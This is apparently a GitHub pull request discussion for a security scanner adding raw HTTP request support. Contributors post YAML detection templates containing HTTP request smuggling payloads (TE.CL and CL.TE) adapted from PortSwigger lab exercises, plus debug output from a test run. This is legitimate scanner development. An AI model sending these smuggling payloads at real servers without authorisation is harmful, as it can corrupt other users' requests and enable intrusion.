### PR TITLE
Full Raw Http support

### PR DESCRIPTION
**Pull request by Mzack9999**

### CODE REVIEW

**Comment by Mzack9999** [comment]
`Unsafe` flag should address #226

**Comment by bauthard** [comment]
@Mzack9999 I see "in progress" label, is this ready for review? also need to rebase with the master, 

Can you also include an example template to invoke RAW HTTP support within the template?

**Comment by Mzack9999** [comment]
Taking example from https://portswigger.net/web-security/request-smuggling/finding/lab-confirming-te-cl-via-differential-responses

```yaml
id: HTTP request smuggling - TE.CL vulnerability via differential responses

info:
  name: malformed http
  author: pdteam
  severity: info

requests:
  - raw:
      - |
        POST /search HTTP/1.1
        Host: vulnerable-website.com
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 4
        Transfer-Encoding: chunked

        7c
        GET /404 HTTP/1.1
        Host: vulnerable-website.com
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 144

        x=
        0

    matchers:
       # The second request should receive an HTTP 404 response (unsure if actually nuclei can handle it)
      - type: dsl
        dsl:
          - 'contains(all_headers, "HTTP/1.1 404")'
        
```

**Comment by bauthard** [comment]
```
Already on 'feature-raw-requests'
Your branch is up to date with 'origin/feature-raw-requests'.
Already up to date.
```

@Mzack9999 I've used the following template:- 

```yaml
id: TE.CL-http-smuggling

info:
  name: smuggling via differential responses
  author: pdteam
  severity: info

requests:
  - raw:
      - |
        POST /search HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 4
        Transfer-Encoding: chunked

        7c
        GET /404 HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 144

        x=
        0

    matchers:
       # The second request should receive an HTTP 404 response (unsure if actually nuclei can handle it)
      - type: word
        words:
          - 'HTTP/1.1 404'
        part: header
```

```
echo https://vulnerable-website.com | ./nuclei -t test.yaml -debug
```

```diff
POST /search HTTP/1.1
Host: vulnerable-website.com
+ Connection: close
+ Connection: close
Content-Length: 4
Content-Type: application/x-www-form-urlencoded
User-Agent: Nuclei - Open-source project (github.com/projectdiscovery/nuclei)

[INF] Dumped HTTP response for https://vulnerable-website.com (TE.CL-http-smuggling)

HTTP/1.1 404 Not Found
Connection: close
Content-Length: 285
Content-Type: text/html; charset=iso-8859-1
Date: Sun, 04 Oct 2020 08:20:09 GMT
Server: Apache/2.4.41 (Ubuntu)

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.41 (Ubuntu) Server at vulnerable-website.com Port 443</address>
</body></html>
```

1. Notice two `Connection` header in 1st request, not defined in the template. 
2. Nuclei does not support a string match in response status code.

**Comment by Mzack9999** [comment]
Working template for HTTP request smuggling (TE.CL vulnerability)

```yaml
id: TE.CL-http-smuggling

info:
  name: HTTP request smuggling - basic CL.TE vulnerability
  author: https://portswigger.net/web-security/request-smuggling/lab-basic-cl-te
  severity: info

requests:
  - raw:
    - |
      POST / HTTP/1.1
      Host: your-lab-id.web-security-academy.net
      Connection: keep-alive
      Content-Type: application/x-www-form-urlencoded
      Content-Length: 6
      Transfer-Encoding: chunked
      
      0
      
      G
    - |
      POST / HTTP/1.1
      Host: your-lab-id.web-security-academy.net
      Connection: keep-alive
      Content-Type: application/x-www-form-urlencoded
      Content-Length: 6
      Transfer-Encoding: chunked
      
      0
      
      G
      
    unsafe: true
    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "Unrecognized method GPOST")'
```

**Pull request merged**
